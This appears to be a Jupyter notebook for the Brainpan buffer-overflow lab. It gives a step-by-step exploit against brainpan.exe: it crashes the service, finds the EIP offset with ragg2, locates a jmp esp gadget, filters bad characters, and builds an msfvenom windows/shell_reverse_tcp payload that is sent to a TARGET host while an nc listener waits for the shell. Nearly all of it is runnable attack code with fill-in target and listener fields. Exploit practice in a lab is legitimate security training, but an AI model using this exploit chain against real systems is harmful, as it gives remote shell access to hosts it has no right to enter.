# Crash Target:

In [1]:
!echo Run this:
!echo winedbg brainpan.exe

Run this:
winedbg brainpan.exe


In [ ]:
from web_footprinting_utils import show_term

show_term("http://10.10.232.141")

In [ ]:
!python3 -c "print('1'*9999)" | ncat 127.0.0.1 9999

# Generate Cyclic Pattern:

In [ ]:
!ragg2 -P 9999 -r | ncat 127.0.0.1 9999

# Locate EIP Offset:

insert EIP addr:

In [ ]:
!ragg2 -q 0x43413243

# Overwrite EIP and ESP:

In [ ]:
!printf "AAAAAAAAAAA" > payload-suffix.txt
!ragg2 -P 524 -r -C payload-suffix.txt | ncat 127.0.0.1 9999

# Locate JMPs to ESP:

In [ ]:
!r2 brainpan.exe -c "/ao jmp esp"

# Create Badchar Payload:

Make sure to put jmp location in little endian:

In [ ]:
python3 -c "print('a' * 524, end='')" > payload.txt
printf "\xf3\x12\x17\x31" >> payload.txt

# Filter Badchars:

In [ ]:
def get_goodchars(badchars=""):
    bytearray_value = ""
    
    human_readable = bytes(badchars, encoding="unicode-escape").decode("ascii")
    badints = [int(x, 16) for x in human_readable.split("\\\\x")[1:]]
    print(human_readable, badints)
    
    for x in range(1, 256):
        if x in badints:
            continue
        else:
            bytearray_value += "\\x" + "{:02x}".format(x)
    bytearray_bytes =bytes(bytearray_value, encoding='ascii').decode('unicode_escape')
    return bytearray_bytes

In [ ]:
bytearray_value = get_goodchars()
print(bytearray_value)

In [ ]:
cat payload.txt chars.txt | ncat 127.0.0.1 9999

In winedbg:

In [ ]:
hexdump -C payload.txt

In [ ]:
info stack 32

In [ ]:
badchars = "\x00\x09\x0d\x0a\x20\xff"

Make sure it matches hexdump! Enter differences into badchars and try again

# Create Local Payload:

Make sure to insert badchars from above:

In [ ]:
!msfvenom -p windows/shell_reverse_tcp LHOST=127.0.0.1 LPORT=7777 EXITFUNC=thread -f raw -b "\x00\x09\x0d\x0a\x20\xff" -n 32 > payload_suffix.txt

In [ ]:
target = ""

In [ ]:
!echo Run this:
!echo rlwrap nc -lvnp 7777

In [ ]:
!cat payload.txt payload_suffix.txt | ncat 127.0.0.1 9999

# Create Final Payload:

In [ ]:
LHOST = ""
TARGET = ""

In [ ]:
!msfvenom -p windows/shell_reverse_tcp LHOST={LHOST} LPORT=7777 EXITFUNC=thread -f raw -b "\x00\x09\x0d\x0a\x20\xff" -n 32 > payload_suffix.txt

In [ ]:
!echo rlwrap nc -lvnp 7777

In [ ]:
!cat payload.txt payload_suffix.txt | ncat {TARGET} 9999